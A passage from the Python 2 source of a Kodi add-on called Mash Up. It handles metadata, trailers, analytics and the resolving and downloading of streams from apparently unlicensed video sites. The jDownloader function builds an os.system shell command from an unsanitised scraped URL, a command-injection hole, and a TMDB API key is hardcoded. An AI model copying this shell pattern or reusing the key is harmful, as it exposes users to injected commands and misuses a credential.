rep = {"%26":"&","&":"&","&":"&",",": ","," ": " ","\n": "","\t": "","\r": "","%5B": "[","%5D": "]",
"%3a": ":","%3A":":","%2f":"/","%2F":"/","%3f":"?","%3F":"?","%3d":"=","%3D":"=","%2C":",","%2c":",","%3C":"<",
"%20":" ","%22":'"',"%3D":"=","%3A":":","%2F":"/","%3E":">","%3B":",","%27":"'","%0D":"","%0A":"","%92":"'",
"<": "<",">": ">",""": '"',"’": "'","´": "'"}
for s, r in rep.items():
text = text.replace(s, r)
text = re.sub(r"<!--.+?-->", "", text)
except TypeError: pass
return text
def removeColorTags(text):
return re.sub('\[COLOR[^\]]{,15}\]','',text.replace("[/COLOR]", ""),re.I|re.DOTALL).strip()
def removeColoredText(text):
return re.sub('\[COLOR.*?\[/COLOR\]','',text,re.I|re.DOTALL).strip()
def SwitchUp():
if selfAddon.getSetting("switchup") == "false":
selfAddon.setSetting(id="switchup", value="true")
else:
selfAddon.setSetting(id="switchup", value="false")
xbmc.executebuiltin("XBMC.Container.Refresh")
def ErrorReport(e):
elogo = xbmc.translatePath('special://home/addons/plugin.video.movie25/resources/art/bigx.png')
xbmc.executebuiltin("XBMC.Notification([COLOR=FF67cc33]Mash Up Error[/COLOR],"+str(e)+",10000,"+elogo+")")
xbmc.log('***********Mash Up Error: '+str(e)+'**************', xbmc.LOGERROR)
def CloseAllDialogs():
xbmc.executebuiltin("XBMC.Dialog.Close(all,true)")
def ClearDir(dir, clearNested = False):
for the_file in os.listdir(dir):
file_path = os.path.join(dir, the_file)
if clearNested and os.path.isdir(file_path):
ClearDir(file_path, clearNested)
try: os.rmdir(file_path)
except Exception, e: print str(e)
else:
try:os.unlink(file_path)
except Exception, e: print str(e)
def CleanTitle(mname):
title = mname.strip()
quality = re.search('(?i)(1080p?)',mname)
if not quality: quality = re.search('(?i)(720p?)',mname)
if not quality: quality = re.search('(?i)(480p?)',mname)
if quality:
quality = quality.group(1).lower()
if not re.search('p$',quality): quality += 'p'
else:
tag = re.search('(?i)(dvdrip|pdtv|xvid|bluray|hdtv|\scam(?![a-z])|r6|r5|\sts|webrip|bdrip|brrip)',mname)
if tag:
quality = tag.group(1).strip()
else: quality = ''
epi = re.search('(?i)s(\d+)e(\d+?)',mname)
if epi:
title = re.findall('(?i)(.+?s\d+e\d+)',mname)[0].strip()
if quality:
title = title + ' [COLOR red]' + quality + '[/COLOR]'
else:
movie = re.search('(?i)(.+?\s\d{4})',mname.replace('(','').replace(')',''))
if movie:
title = movie.group(1).strip() + ' [COLOR red]' + quality + '[/COLOR]'
return title
def removeFile(file):
try:
if os.path.exists(file): os.remove(file)
return True
except: return False
def getFileName(file):
return re.sub('.*?([\w-]+)\.[^\.]+$','\\1',file)
def getFile(path):
content = None
if os.path.exists(path):
try: content = open(path).read()
except: pass
return content
def setFile(path,content,force=False):
if os.path.exists(path) and not force:
return False
else:
try:
open(path,'w+').write(content)
return True
except: pass
return False
def downloadFile(url,dest,silent = False,cookie = None):
try:
import urllib2
file_name = url.split('/')[-1]
print "Downloading: %s" % (file_name)
if cookie:
import cookielib
cookie_file = os.path.join(os.path.join(datapath,'Cookies'), cookie+'.cookies')
cj = cookielib.LWPCookieJar()
if os.path.exists(cookie_file):
try: cj.load(cookie_file,True)
except: cj.save(cookie_file,True)
else: cj.save(cookie_file,True)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
else:
opener = urllib2.build_opener()
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3')]
u = opener.open(url)
f = open(dest, 'wb')
meta = u.info()
if meta.getheaders("Content-Length"):
file_size = int(meta.getheaders("Content-Length")[0])
else: file_size = 'Unknown'
file_size_dl = 0
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer: break
file_size_dl += len(buffer)
f.write(buffer)
# status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size)
# status = status + chr(8)*(len(status)+1)
# print status,
print "Downloaded: %s %s Bytes" % (file_name, file_size)
f.close()
return True
except Exception, e:
print 'Error downloading file ' + url.split('/')[-1]
ErrorReport(e)
if not silent:
dialog = xbmcgui.Dialog()
dialog.ok("Mash Up", "Report the error below at " + supportsite, str(e), "We will try our best to help you")
return False
def updateSearchFile(searchQuery,searchType,defaultValue = '###',searchMsg = ''):
addToSearchHistory = True
searchpath=os.path.join(datapath,'Search')
if searchType == "TV":
searchHistoryFile = "SearchHistoryTv"
if not searchMsg: searchMsg = 'Search For TV Shows'
else:
searchHistoryFile = "SearchHistory25"
if not searchMsg: searchMsg = 'Search For Movies'
SearchFile=os.path.join(searchpath,searchHistoryFile)
searchQuery=urllib.unquote(searchQuery)
if not searchQuery or searchQuery == defaultValue:
searchQuery = ''
try: os.makedirs(searchpath)
except: pass
keyb = xbmc.Keyboard('', searchMsg )
keyb.doModal()
if (keyb.isConfirmed()):
searchQuery = keyb.getText()
else:
xbmcplugin.endOfDirectory(int(sys.argv[1]),False,False)
return False
else:
addToSearchHistory = False
searchQuery=urllib.quote(searchQuery)
if os.path.exists(SearchFile):
searchitems=re.compile('search="([^"]+?)",').findall(open(SearchFile,'r').read())
if searchitems.count(searchQuery) > 0: addToSearchHistory = True
if addToSearchHistory:
if not os.path.exists(SearchFile) and searchQuery != '':
open(SearchFile,'w').write('search="%s",'%searchQuery)
elif searchQuery != '':
open(SearchFile,'a').write('search="%s",'%searchQuery)
else: return False
searchitems=re.compile('search="([^"]+?)",').findall(open(SearchFile,'r').read())
rewriteSearchFile = False
if searchitems.count(searchQuery) > 1:
searchitems.remove(searchQuery)
rewriteSearchFile = True
if len(searchitems)>=10:
searchitems.remove(searchitems[0])
rewriteSearchFile = True
if rewriteSearchFile:
os.remove(SearchFile)
for searchitem in searchitems:
try: open(SearchFile,'a').write('search="%s",'%searchitem)
except: pass
return searchQuery
def supportedHost(host):
if 'ul' == host: host = 'uploaded'
return host.lower() in getHostList()
################################################################################ Notifications #########################################################################################################
def CheckVersion():
try:
link=OPENURL('http://repo.mashupxbmc.com/plugin.video.movie25/resources/libs/main.py',verbose=False)
except:
link='nill'
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('VERSION = "(.+?)"').findall(link)
if len(match)>0:
if VERSION != str(match[0]):
dialog = xbmcgui.Dialog()
ok=dialog.ok('[B]New Update Available![/B]', "Your version of Mash Up is outdated." ,'The current available version is '+str(match[0]),'To update goto addons under system settings')
print 'Mash Up v'+VERSION+' is Outdated'
return False
else:
print 'Mash Up v'+VERSION+' is Up to Date'
return True
else:
print 'CloudFlare Link Down'
return False
######################################################################## Live Stream do Regex ############################################################
def doRegex(murl):
#rname=rname.replace('><','').replace('>','').replace('<','')
import urllib2
url=re.compile('([^<]+)<regex>',re.DOTALL).findall(murl)[0]
doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
for k in doRegexs:
if k in murl:
regex=re.compile('<name>'+k+'</name><expres>(.+?)</expres><page>(.+?)</page><referer>(.+?)</referer></regex>',re.DOTALL).search(murl)
referer=regex.group(3)
if referer=='':
referer=regex.group(2)
req = urllib2.Request(regex.group(2))
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:10.0a1) Gecko/20111029 Firefox/10.0a1')
req.add_header('Referer',referer)
response = urllib2.urlopen(req)
link=response.read()
response.close()
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','').replace('\/','/')
r=re.compile(regex.group(1),re.DOTALL).findall(link)[0]
url = url.replace("$doregex[" + k + "]", r)
return url
################################################################################ AutoView ##########################################################################################################
def VIEWS():
if selfAddon.getSetting("auto-view") == "true":
if selfAddon.getSetting("choose-skin") == "true":
if selfAddon.getSetting("con-view") == "0":
xbmc.executebuiltin("Container.SetViewMode(50)")
elif selfAddon.getSetting("con-view") == "1":
xbmc.executebuiltin("Container.SetViewMode(51)")
elif selfAddon.getSetting("con-view") == "2":
xbmc.executebuiltin("Container.SetViewMode(500)")
elif selfAddon.getSetting("con-view") == "3":
xbmc.executebuiltin("Container.SetViewMode(501)")
elif selfAddon.getSetting("con-view") == "4":
xbmc.executebuiltin("Container.SetViewMode(508)")
elif selfAddon.getSetting("con-view") == "5":
xbmc.executebuiltin("Container.SetViewMode(504)")
elif selfAddon.getSetting("con-view") == "6":
xbmc.executebuiltin("Container.SetViewMode(503)")
elif selfAddon.getSetting("con-view") == "7":
xbmc.executebuiltin("Container.SetViewMode(515)")
return
elif selfAddon.getSetting("choose-skin") == "false":
if selfAddon.getSetting("xpr-view") == "0":
xbmc.executebuiltin("Container.SetViewMode(50)")
elif selfAddon.getSetting("xpr-view") == "1":
xbmc.executebuiltin("Container.SetViewMode(52)")
elif selfAddon.getSetting("xpr-view") == "2":
xbmc.executebuiltin("Container.SetViewMode(501)")
elif selfAddon.getSetting("xpr-view") == "3":
xbmc.executebuiltin("Container.SetViewMode(55)")
elif selfAddon.getSetting("xpr-view") == "4":
xbmc.executebuiltin("Container.SetViewMode(54)")
elif selfAddon.getSetting("xpr-view") == "5":
xbmc.executebuiltin("Container.SetViewMode(60)")
elif selfAddon.getSetting("xpr-view") == "6":
xbmc.executebuiltin("Container.SetViewMode(53)")
return
else:
return
def VIEWSB():
if selfAddon.getSetting("auto-view") == "true":
if selfAddon.getSetting("home-view") == "0":
xbmc.executebuiltin("Container.SetViewMode(50)")
elif selfAddon.getSetting("home-view") == "1":
xbmc.executebuiltin("Container.SetViewMode(500)")
return
def VIEWSB2():
if selfAddon.getSetting("auto-view") == "true":
if selfAddon.getSetting("sub-view") == "0":
xbmc.executebuiltin("Container.SetViewMode(50)")
elif selfAddon.getSetting("sub-view") == "1":
xbmc.executebuiltin("Container.SetViewMode(500)")
return
################################################################################ Movies Metahandler ##########################################################################################################
def formatCast(cast):
roles = "\n\n"
for role in cast:
roles = roles + "[COLOR blue]" + role[0] + "[/COLOR] as " + role[1] + " | "
return roles
def GETMETAT(mname,genre,fan,thumb,plot='',imdb='',tmdb=''):
originalName=mname
if selfAddon.getSetting("meta-view") == "true":
setGrab()
mname = re.sub(r'\[COLOR red\]\(?(\d{4})\)?\[/COLOR\]',r'\1',mname)
mname = removeColoredText(mname)
mname = mname.replace(' EXTENDED and UNRATED','').replace('Webrip','').replace('MaxPowers','').replace('720p','').replace('1080p','').replace('TS','').replace('HD','').replace('R6','').replace('H.M.','').replace('HackerMil','').replace('(','').replace(')','').replace('[','').replace(']','')
mname = mname.replace(' Extended Cut','').replace('Awards Screener','')
mname = re.sub('Cam(?![A-Za-z])','',mname)
mname = re.sub('(?i)3-?d h-?sbs','',mname)
mname = mname.strip()
if re.findall('\s\d{4}',mname):
r = re.split('\s\d{4}',mname,re.DOTALL)
name = r[0]
year = re.findall('\s(\d{4})\s',mname + " ")
if year: year = year[0]
else: year=''
else:
name=mname
year=''
name = name.decode("ascii", "ignore")
meta = grab.get_meta('movie',name,imdb,tmdb,year)# first is Type/movie or tvshow, name of show,tvdb id,imdb id,string of year,unwatched = 6/watched = 7
if not meta['year']:
name = re.sub(':.*','',name)
meta = grab.get_meta('movie',name,imdb,tmdb,year)
print "Movie mode: %s"%name
infoLabels = {'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],
'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'overlay':meta['overlay'],
'director': meta['director'],'cast': meta['cast'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year'],
'imdb_id' : meta['imdb_id']}
if infoLabels['genre']=='':
infoLabels['genre']=genre
if infoLabels['cover_url']=='':
infoLabels['cover_url']=thumb
if infoLabels['backdrop_url']=='':
if fan=='': fan=fanartimage
else: fan=fan
infoLabels['backdrop_url']=fan
if meta['overlay'] == 7: infoLabels['playcount'] = 1
else: infoLabels['playcount'] = 0
if infoLabels['cover_url']=='':
thumb=art+'/vidicon.png'
infoLabels['cover_url']=thumb
#if int(year+'0'):
# infoLabels['year']=year
infoLabels['metaName']=infoLabels['title']
infoLabels['title']=originalName
if infoLabels['plot']=='': infoLabels['plot']=plot
else: infoLabels['plot'] = infoLabels['plot'] + formatCast(infoLabels['cast'])
else:
if thumb=='': thumb=art+'/vidicon.png'
if fan=='': fan=fanartimage
else: fan=fan
infoLabels = {'title': mname,'metaName': mname,'cover_url': thumb,'backdrop_url': fan,'season': '','episode': '','year': '','plot': '','genre': genre,'imdb_id': '','tmdb_id':''}
return infoLabels
################################################################################ TV Shows Metahandler ##########################################################################################################
def GETMETAEpiT(mname,thumb,desc):
originalName=mname
mname = removeColoredText(mname)
if selfAddon.getSetting("meta-view-tv") == "true":
setGrab()
mname = mname.replace('New Episode','').replace('Main Event','').replace('New Episodes','')
mname = mname.strip()
r = re.findall('(.+?)\ss(\d+)e(\d+)\s',mname + " ",re.I)
if not r: r = re.findall('(.+?)\sseason\s(\d+)\sepisode\s(\d+)\s',mname + " ",re.I)
if not r: r = re.findall('(.+?)\s(\d+)x(\d+)\s',mname + " ",re.I)
if r:
for name,sea,epi in r:
year=''
name=name.replace(' US','').replace(' (US)','').replace(' (us)','').replace(' (uk Series)','').replace(' (UK)','').replace(' UK',' (UK)').replace(' AU','').replace(' AND',' &').replace(' And',' &').replace(' and',' &').replace(' 2013','').replace(' 2011','').replace(' 2012','').replace(' 2010','')
if re.findall('twisted',name,re.I):
year='2013'
if re.findall('the newsroom',name,re.I):
year='2012'
metaq = grab.get_meta('tvshow',name,None,None,year)
imdb=metaq['imdb_id']
tit=metaq['title']
year=metaq['year']
epiname=''
else:
metaq=''
name=mname
epiname=''
sea=0
epi=0
imdb=''
tit=''
year=''
meta = grab.get_episode_meta(str(name),imdb, int(sea), int(epi))
print "Episode Mode: Name %s Season %s - Episode %s"%(str(name),str(sea),str(epi))
infoLabels = {'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'premiered':meta['premiered'],
'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'overlay':meta['overlay'],'episode': meta['episode'],
'season': meta['season'],'backdrop_url': meta['backdrop_url']}
if infoLabels['cover_url']=='':
if metaq!='':
thumb=metaq['cover_url']
infoLabels['cover_url']=thumb
if infoLabels['backdrop_url']=='':
fan=fanartimage
infoLabels['backdrop_url']=fan
if infoLabels['cover_url']=='':
if thumb=='':
thumb=art+'/vidicon.png'
infoLabels['cover_url']=thumb
else:
infoLabels['cover_url']=thumb
infoLabels['imdb_id']=imdb
if meta['overlay'] == 7:
infoLabels['playcount'] = 1
else:
infoLabels['playcount'] = 0
infoLabels['showtitle']=tit
infoLabels['year']=year
infoLabels['metaName']=infoLabels['title']
infoLabels['title']=originalName
else:
fan=fanartimage
infoLabels = {'title': originalName,'metaName': mname,'cover_url': thumb,'backdrop_url': fan,'season': '','episode': '','year': '','plot': desc,'genre': '','imdb_id': ''}
return infoLabels
############################################################################### Playback resume/ mark as watched #################################################################################
def WatchedCallback():
xbmc.log('%s: %s' % (selfAddon.addon.getAddonInfo('name'), 'Video completely watched.'), xbmc.LOGNOTICE)
videotype='movies'
setGrab()
grab.change_watched(videotype, name, iconimage, season='', episode='', year='', watched=7)
xbmc.executebuiltin("XBMC.Container.Refresh")
def WatchedCallbackwithParams(video_type, title, imdb_id, season, episode, year):
print "worked"
setGrab()
grab.change_watched(video_type, title, imdb_id, season=season, episode=episode, year=year, watched=7)
xbmc.executebuiltin("XBMC.Container.Refresh")
def ChangeWatched(imdb_id, videoType, name, season, episode, year='', watched='', refresh=False):
setGrab()
grab.change_watched(videoType, name, imdb_id, season=season, episode=episode, year=year, watched=watched)
xbmc.executebuiltin("XBMC.Container.Refresh")
def refresh_movie(vidtitle,imdb, year=''):
#global metaget
#if not metaget:
# metaget=metahandlers.MetaData()
vidtitle = vidtitle.decode("ascii", "ignore")
if re.search("^\d+", vidtitle):
m = re.search('^(\d+)(.*)', vidtitle)
vidtitle = m.group(1) + m.group(2)
else: vidtitle = re.sub("\d+", "", vidtitle)
vidtitle=vidtitle.replace(' ','')
setGrab()
search_meta = grab.search_movies(vidtitle)
if search_meta:
movie_list = []
for movie in search_meta:
movie_list.append(movie['title'] + ' (' + str(movie['year']) + ')')
dialog = xbmcgui.Dialog()
index = dialog.select('Choose', movie_list)
if index > -1:
new_imdb_id = search_meta[index]['imdb_id']
new_tmdb_id = search_meta[index]['tmdb_id']
year=search_meta[index]['year']
meta=grab.update_meta('movie', vidtitle, imdb, '',new_imdb_id,new_tmdb_id,year)
xbmc.executebuiltin("Container.Refresh")
else:
xbmcgui.Dialog().ok('Refresh Results','No matches found')
def episode_refresh(vidname, imdb, season_num, episode_num):
setGrab()
grab.update_episode_meta(vidname, imdb, season_num, episode_num)
xbmc.executebuiltin("XBMC.Container.Refresh")
################################################################################Trailers#######################################################################
def trailer(tmdbid):
if tmdbid == '':
xbmc.executebuiltin("XBMC.Notification(Sorry!,No Trailer Available For This Movie,3000)")
else:
import urllib2
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Loading Trailer,1500)")
user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:10.0a1) Gecko/20111029 Firefox/10.0a1'
request= 'http://api.themoviedb.org/3/movie/' + tmdbid + '/trailers?api_key=d5da2b7895972fffa2774ff23f40a92f'
txheaders= {'Accept': 'application/json','User-Agent':user_agent}
req = urllib2.Request(request,None,txheaders)
response=urllib2.urlopen(req).read()
if re.search('"size":"HD"',response):
quality=re.compile('"size":"HD","source":"(.+?)"').findall(response)[0]
youtube='http://www.youtube.com/watch?v=' + quality
stream_url= "plugin://plugin.video.youtube/?path=/root/video&action=play_video&videoid="+quality+"&hd=1"
xbmc.Player().play(stream_url)
elif re.search('"size":"HQ"',response):
quality=re.compile('"size":"HQ","source":"(.+?)"').findall(response)[0]
youtube='http://www.youtube.com/watch?v=' + quality
stream_url= "plugin://plugin.video.youtube/?path=/root/video&action=play_video&videoid="+quality+"&hd=1"
xbmc.Player().play(stream_url)
elif re.search('"size":"Standard"',response):
quality=re.compile('"size":"Standard","source":"(.+?)"').findall(response)[0]
youtube='http://www.youtube.com/watch?v=' + quality
stream_url= "plugin://plugin.video.youtube/?path=/root/video&action=play_video&videoid="+quality+"&hd=1"
xbmc.Player().play(stream_url)
else:
xbmc.executebuiltin("XBMC.Notification(Sorry!,No Trailer Available For This Movie,3000)")
def TRAILERSEARCH(url, name, imdb):
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Getting Trailers Result,2000)")
name = re.split(':\s\[',name)
search = name[0]
setGrab()
infoLabels = grab._cache_lookup_by_name('movie', search.strip(), year='')
print infoLabels
res_name = []
res_url = []
res_name.append('[COLOR red][B]Cancel[/B][/COLOR]')
site = ' site:http://www.youtube.com '
results = SearchGoogle(search+' official trailer', site)
for res in results:
if res.url.encode('utf8').startswith('http://www.youtube.com/watch'):
res_name.append(res.title.encode('utf8'))
res_url.append(res.url.encode('utf8'))
results = SearchGoogle(search[:(len(search)-7)]+' official trailer', site)
for res in results:
if res.url.encode('utf8').startswith('http://www.youtube.com/watch') and res.url.encode('utf8') not in res_url:
res_name.append(res.title.encode('utf8'))
res_url.append(res.url.encode('utf8'))
dialog = xbmcgui.Dialog()
ret = dialog.select(search + ' trailer search',res_name)
if ret == 0:
return
elif ret >= 1:
trailer_url = res_url[ret - 0]
try:
xbmc.executebuiltin(
"PlayMedia(plugin://plugin.video.youtube/?action=play_video&videoid=%s)"
% str(trailer_url)[str(trailer_url).rfind("v=")+2:] )
if re.findall('Darwin iOS',PLATFORM):
grab.update_trailer('movie', imdb, trailer_url)
xbmc.executebuiltin("XBMC.Container.Refresh")
except:
return
def SearchGoogle(search, site):
from xgoogle.search import GoogleSearch
gs = GoogleSearch(''+search+' '+site)
gs.results_per_page = 25
gs.page = 0
try:
results = gs.get_results()
except Exception, e:
print '***** Error: %s' % e
return None
return results
############################################################################### Resolvers ############################################################################################
def resolve_url(url,filename = False):
import resolvers
return resolvers.resolve_url(url,filename)
############################################################################### Download Code ###########################################################################################
downloadPath = selfAddon.getSetting('download-folder')
DownloadLog=os.path.join(datapath,'Downloads')
try:
os.makedirs(DownloadLog)
except:
pass
DownloadFile=os.path.join(DownloadLog,'DownloadLog')
class StopDownloading(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def GetUrliW(url):
link=OPENURL(url)
link=unescapes(link)
match=re.compile('<(?:iframe|pagespeed_iframe).+?src=\"(.+?)\"').findall(link)
link=match[0]
return link
def geturl(murl):
link=OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','')
match=re.compile('<a class="myButton" href="(.+?)">Click Here to Play</a>').findall(link)
if len(match)==0:
match=re.compile('<a class="myButton" href="(.+?)">Click Here to Play Part1</a><a class="myButton" href="(.+?)">Click Here to Play Part2</a>').findall(link)
return match[0]
else:
return match[0]
def resolveDownloadLinks(url):
if re.search('watchseries.lt',url):
match=re.compile('(.+?)xocx(.+?)xocx').findall(url)
for hurl, durl in match:
url=geturl('http://watchseries.lt'+hurl)
elif re.search('iwatchonline',url):
name=name.split('[COLOR red]')[0]
name=name.replace('/','').replace('.','')
url=GetUrliW(url)
elif re.search('movie25',url):
from resources.libs import movie25
url = movie25.resolveM25URL(url)
elif '</t><sec>' in url:
from resources.libs.movies_tv import icefilms
url = icefilms.resolveIceLink(url)
elif 'mobapps.cc' in url or 'vk.com' in url:
from resources.libs.plugins import mbox
url = mbox.resolveMBLink(url)
elif 'noobroom' in url:
from resources.libs.movies_tv import starplay
url = starplay.find_noobroom_video_url(url)
return url
def Download_Source(name,url):
originalName=name
url = resolveDownloadLinks(url)
name=removeColoredText(name)
name=name.replace('/','').replace('\\','').replace(':','').replace('|','')
name=re.sub(r'[^\w]', ' ', name)
name=name.split(' [')[0]
name=name.split('[')[0]
name=name.split(' /')[0]
name=name.split('/')[0]
stream_url = resolve_url(url)
if stream_url:
print stream_url
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,2000)")
if os.path.exists(downloadPath):
if re.search("flv",stream_url):name += '.flv'
elif re.search("mkv",stream_url): name += '.mkv'
elif re.search("mp4",stream_url): name += '.mp4'
elif re.search("avi",stream_url): name += '.avi'
elif re.search("divx",stream_url): name += '.divx'
else: name += '.mp4'
mypath=os.path.join(downloadPath,name)
if os.path.isfile(mypath):
xbmc.executebuiltin("XBMC.Notification(Download Alert!,The video you are trying to download already exists!,8000)")
else:
name=name.replace(' ','')
DownloadInBack=selfAddon.getSetting('download-in-background')
if DownloadInBack == 'true':
QuietDownload(stream_url,mypath,originalName,name)
else:
Download(stream_url,mypath,originalName,name)
else:
xbmc.executebuiltin("XBMC.Notification(Download Alert!,You have not set the download folder,8000)")
return False
else:
xbmc.executebuiltin("XBMC.Notification(Sorry!,Link Not Found,6000)")
stream_url = False
def Download(url, dest,originalName, displayname=False):
if displayname == False:
displayname=url
delete_incomplete = selfAddon.getSetting('delete-incomplete-downloads')
dp = xbmcgui.DialogProgress()
dp.create('Downloading: '+displayname)
start_time = time.time()
try:
urllib.urlretrieve(url, dest, lambda nb, bs, fs: _pbhook(nb, bs, fs, dp, start_time))
open(DownloadFile,'a').write('{name="%s",destination="%s"}'%(originalName,dest))
except:
if delete_incomplete == 'true':
#delete partially downloaded file if setting says to.
while os.path.exists(dest):
try:
os.remove(dest)
break
except: pass
#only handle StopDownloading (from cancel), ContentTooShort (from urlretrieve), and OS (from the race condition); let other exceptions bubble
if sys.exc_info()[0] in (urllib.ContentTooShortError, StopDownloading, OSError):
return False
else: raise
return False
return True
def QuietDownload(url, dest,originalName, videoname):
import download
download.download(url, dest,title=originalName)
def _pbhook(numblocks, blocksize, filesize, dp, start_time):
try:
percent = min(numblocks * blocksize * 100 / filesize, 100)
currently_downloaded = float(numblocks) * blocksize / (1024 * 1024)
kbps_speed = numblocks * blocksize / (time.time() - start_time)
if kbps_speed > 0: eta = (filesize - numblocks * blocksize) / kbps_speed
else: eta = 0
kbps_speed = kbps_speed / 1024
total = float(filesize) / (1024 * 1024)
mbs = '%.02f MB of %.02f MB' % (currently_downloaded, total)
e = 'Speed: %.02f Kb/s ' % kbps_speed
e += 'ETA: %02d:%02d' % divmod(eta, 60)
dp.update(percent, mbs, e)
except:
percent = 100
dp.update(percent)
if dp.iscanceled():
dp.close()
raise StopDownloading('Stopped Downloading')
def jDownloader(murl):
url = resolveDownloadLinks(murl)
if selfAddon.getSetting("jdcb") == "true":
print "Downloading "+murl+" via jDownlaoder"
cmd = 'plugin://plugin.program.jdownloader/?action=addlink&url='+murl
xbmc.executebuiltin('XBMC.RunPlugin(%s)' % cmd)
else:
if 'Win' in PLATFORM:
command = 'echo ' + url.strip() + '| clip'
os.system(command)
else:
command = 'echo ' + url.strip() + '| pbcopy'
os.system(command)
################################################################################ Message ##########################################################################################################
def Message():
help = SHOWMessage()
help.doModal()
main.GA("None","Mash2k3Info")
del help
class SHOWMessage(xbmcgui.Window):
def __init__(self):
self.addControl(xbmcgui.ControlImage(0,0,1280,720,art+'/infoposter.png'))
def onAction(self, action):
if action == 92 or action == 10:
xbmc.Player().stop()
self.close()
def TextBoxes(heading,anounce):
class TextBox():
"""Thanks to BSTRDMKR for this code:)"""
# constants
WINDOW = 10147
CONTROL_LABEL = 1
CONTROL_TEXTBOX = 5
def __init__( self, *args, **kwargs):
# activate the text viewer window
xbmc.executebuiltin( "ActivateWindow(%d)" % ( self.WINDOW, ) )
# get window
self.win = xbmcgui.Window( self.WINDOW )
# give window time to initialize
xbmc.sleep( 500 )
self.setControls()
def setControls( self ):
# set heading
self.win.getControl( self.CONTROL_LABEL ).setLabel(heading)
try:
f = open(anounce)
text = f.read()
except:
text=anounce
self.win.getControl( self.CONTROL_TEXTBOX ).setText(text)
return
TextBox()
################################################################################ Google Analytics ##########################################################################################################
def parseDate(dateString,datetime):
try:
return datetime.datetime.fromtimestamp(time.mktime(time.strptime(dateString.encode('utf-8', 'replace'), "%Y-%m-%d %H:%M:%S")))
except:
return datetime.datetime.today() - datetime.timedelta(days = 1) #force update
def checkGA():
if selfAddon.getSetting("gastatus") == "true":
import datetime
secsInHour = 60 * 60
threshold = 2 * secsInHour
now = datetime.datetime.today()
prev = parseDate(selfAddon.getSetting('ga_time'),datetime)
delta = now - prev
nDays = delta.days
nSecs = delta.seconds
doUpdate = (nDays > 0) or (nSecs > threshold)
if not doUpdate:
return
selfAddon.setSetting('ga_time', str(now).split('.')[0])
threading.Thread(target=APP_LAUNCH).start()
else:
print "MashUp Google Analytics disabled"
def send_request_to_google_analytics(utm_url):
ua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'
import urllib2
try:
req = urllib2.Request(utm_url, None,
{'User-Agent':ua}
)
response = urllib2.urlopen(req).read()
except:
print ("GA fail: %s" % utm_url)
return response
def GA(group,name):
if selfAddon.getSetting("gastatus") == "true":
threading.Thread(target=GAthread, args=(group,name)).start()
def GAthread(group,name):
try:
try:
from hashlib import md5
except:
from md5 import md5
from random import randint
import time
from urllib import unquote, quote
from os import environ
from hashlib import sha1
VISITOR = selfAddon.getSetting('visitor_ga')
utm_gif_location = "http://www.google-analytics.com/__utm.gif"
if not group=="None":
utm_track = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmt=" + "event" + \
"&utme="+ quote("5("+PATH+"*"+group+"*"+name+")")+\
"&utmp=" + quote(PATH) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR,VISITOR,"2"])
try:
print "============================ POSTING TRACK EVENT ============================"
send_request_to_google_analytics(utm_track)
except:
print "============================ CANNOT POST TRACK EVENT ============================"
if name=="None":
utm_url = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmp=" + quote(PATH) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR, VISITOR,"2"])
else:
if group=="None":
utm_url = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmp=" + quote(PATH+"/"+name) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR, VISITOR,"2"])
else:
utm_url = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmp=" + quote(PATH+"/"+group+"/"+name) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR, VISITOR,"2"])
print "============================ POSTING ANALYTICS ============================"
send_request_to_google_analytics(utm_url)
except:
print "================ CANNOT POST TO ANALYTICS ================"
def APP_LAUNCH():
versionNumber = int(xbmc.getInfoLabel("System.BuildVersion" )[0:2])
if versionNumber < 12:
if xbmc.getCondVisibility('system.platform.osx'):
if xbmc.getCondVisibility('system.platform.atv2'):
log_path = '/var/mobile/Library/Preferences'
else:
log_path = os.path.join(os.path.expanduser('~'), 'Library/Logs')
elif xbmc.getCondVisibility('system.platform.ios'):
log_path = '/var/mobile/Library/Preferences'
elif xbmc.getCondVisibility('system.platform.windows'):
log_path = xbmc.translatePath('special://home')
elif xbmc.getCondVisibility('system.platform.linux'):
log_path = xbmc.translatePath('special://home/temp')
else:
log_path = xbmc.translatePath('special://logpath')
else:
print '======================= more than ===================='
log_path = xbmc.translatePath('special://logpath')
log = os.path.join(log_path, 'xbmc.log')
try:
